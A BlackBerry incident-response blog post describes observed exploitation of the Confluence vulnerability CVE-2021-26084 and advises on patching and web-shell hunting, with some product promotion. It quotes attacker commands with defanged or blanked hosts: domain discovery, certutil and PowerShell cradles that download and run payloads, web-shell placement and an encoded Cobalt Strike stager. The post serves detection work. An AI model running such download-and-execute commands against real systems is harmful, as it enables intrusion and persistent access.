Blue Team: A Defensive Perspective on the Confluence Vulnerability (CVE-2021-26084)
Over the past week and during the Labor Day holiday weekend, the BlackBerry Incident Response (IR) team has seen an increase in confirmed exploitation of the recently disclosed Confluence Server and Data Center vulnerability, assigned CVE-2021-26084. This continues a recent trend of critical vulnerabilities affecting external facing systems.
This vulnerability allows attackers to perform pre-authenticated remote code execution (RCE), which means that code can be run on a target device before the victim is logged in. With multiple proof-of-concept (POC) exploits floating around on the Internet, threat actors are scanning the web and dropping payloads as quickly as possible before network defenders have an opportunity to mitigate.
This article will highlight several attacker techniques we are seeing across multiple environments, such as abuse of Certutil and PowerShell to discover information about an infected system and network, and to deploy additional persistence mechanisms.
Most Common Attacker Techniques
While this vulnerability also affects Linux® installations, the incidents that we have seen thus far have been running on Windows®. In these cases, BlackBerry observed the command prompt spawned as a child process of the tomcat9.exe process. By hunting on this parent/child relationship, many related events were identified:
> cmd.exe /c
BlackBerry researchers initially found generic system discovery commands being used to enumerate information about the system and network for the impacted host:
cmd.exe /c "net user /domain"
cmd.exe /c "net time /domain"
cmd.exe /c "net group \"domain admins\" /domain"
Certutil is a legitimate utility used by Windows Certificate Services for the configuration and management of certificates. This tool is also commonly abused by threat actors to perform a variety of malicious activities. Threat actors often select legitimate Windows utilities because they are already present on a victim’s system and are unlikely to be flagged as suspicious – this attacker technique is called “living off the land” (LotL).
In the case of these Confluence exploitation events, certutil was abused to download web shells and executable files. Below is an example of how certutil was used to download a malicious binary file:
cmd.exe /c "certutil.exe -urlcache -split -f hxxp:///aaaa[.]exe
BlackBerry also discovered cases of PowerShell being used to download and execute code, scripts, and executable files. Examples of these commands are included below.
powershell -c "Invoke-WebRequest -uri http://:/hhhh -OutFile iiii[.]exe;./iiii[.]exe"
cmd.exe /c "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://:/jjjj'))\""
cmd.exe /c "PoWershElL.exE -eXEc bypASS -noP -WInD HIdDEN -C IeX (NeW-OBjeCt Net.WeBClIeNt).DowNlOAdStRinG(http://:/kkkk.json;)"
cmd.exe /c "powershell -w hidden -c (new-object system.net.webclient).downloadfile(http://:/llll.jpg;llll.bat;);start-process llll.bat"
Threat actors install backdoors to compromised hosts to prevent the need for re-exploitation. This is done to ensure that they maintain access even after patching occurs.
Because Apache Tomcat can run Java Server Page (JSP) files to execute server-side code on the web server itself, threat actors are abusing this software to install web shells on vulnerable Confluence servers. This allows them to create persistent access to the impacted systems. Examples of how certutil is abused to download web shell files include the following:
cmd /c \"cd /d \"\\Program Files\\Atlassian\\Confluence\\confluence\\\"&certutil.exe -urlcache -split -f http:///bbbb[.]jsp images\\themes\\cccc[.]jsp"
cmd.exe /c \"certutil.exe -urlcache -split -f http:///dddd[.]jsp confluence/eeee[.]jsp\"
cmd.exe /c \"certutil.exe -urlcache -split -f http:///ffff[.]jsp ./confluence/gggg[.]jsp\"
In some cases, the threat actor deployed Cobalt Strike stagers to the infected systems to create persistence in memory and stage for additional lateral movement. A partial example of the Cobalt Strike deployment is included below.
cmd.exe /c "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlA[redacted]"
Actions to Take
First, check this list to see if you have an on-premise, affected version of Confluence Server or Data Center. If you are running an affected version, the next step is to upgrade to a fixed version if you’re able. If you are not able to upgrade, implement the temporary workaround supplied by Atlassian.
Finally, it’s critical to check for signs of compromise on the Confluence host and surrounding environment. We listed some of the attacker techniques above that should be detected if compromise has occurred. Check the entire file system for any signs of web shells. Note that attackers can use very small web shells such as China Chopper, which can time-match itself to surrounding files to blend in and avoid detection.
BlackBerry Cyber Suite and BlackBerry Guard stop these attacks
If in doubt, call in the experts at BlackBerry to perform forensic analysis and conduct a compromise assessment. BlackBerry customers can feel confident that our AI-driven BlackBerry® Cyber Suite, as well as our Managed Detection & Response (MDR) solution BlackBerry® Guard, are well-equipped to mitigate the risks posed by these continued external-facing vulnerabilities. Core technology includes:
- BlackBerry® Protect provides automated malware prevention, application and script control, memory protection, and device policy enforcement.
- BlackBerry® Optics extends the threat prevention by using BlackBerry Optics Context Analysis Engine (CAE) rules to provide additional telemetry. The following rules were effective at identifying exploitation of the vulnerability:
- Certutil Abuse
- Powershell Download
- Powershell Encoded Command
- One-Liner ML Module
- Account Discovery
Victim of an Attack?
In the unfortunate event that it is too late for prevention and you believe you have already been the victim of an attack, please contact us, regardless of your existing BlackBerry relationship.
The BlackBerry Incident Response team is made up of world-class consultants dedicated to handling response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.
Read our latest blog on this vulnerability: Red Team: An Offensive Perspective on the Confluence Vulnerability (CVE-2021-26084)
About Tony Lee
Vice President of Global Services Technical Operations, BlackBerry.
Tony Lee, Vice President of BlackBerry Global Services Technical Operations, has more than fifteen years of professional research and consulting experience pursuing his passion in all areas of information security.
As an avid educator, Tony has instructed thousands of students at many venues worldwide, including government, universities, corporations, and conferences such as Black Hat. He takes every opportunity to share knowledge as a contributing author to Hacking Exposed 7, and is also a frequent blogger, researcher, and author of white papers on topics ranging from Citrix Security, the China Chopper Web shell, and Cisco's SYNFul Knock router implant.
Over the years, he has contributed many tools to the security community such as UnBup, Forensic Investigator Splunk app, and CyBot, the extensible Threat Intelligence Bot framework designed for anyone from a home user to a SOC analyst.
About Codi Starks
Senior Professional Services Incident Response Consultant at BlackBerry.
Codi Starks has more than twelve years of IT, cybersecurity, and incident response experience. During his time in the field he has supported and led difficult incident response engagements for Fortune 500 companies spanning multiple continents.
He currently holds several certifications and achievements, including an M.S. in Information Security and Assurance, as well as the OSCP and SANS GCFE certifications. He has won multiple cybersecurity competitions, including OpenSOC, SANS DFIR Netwars, and SOCX.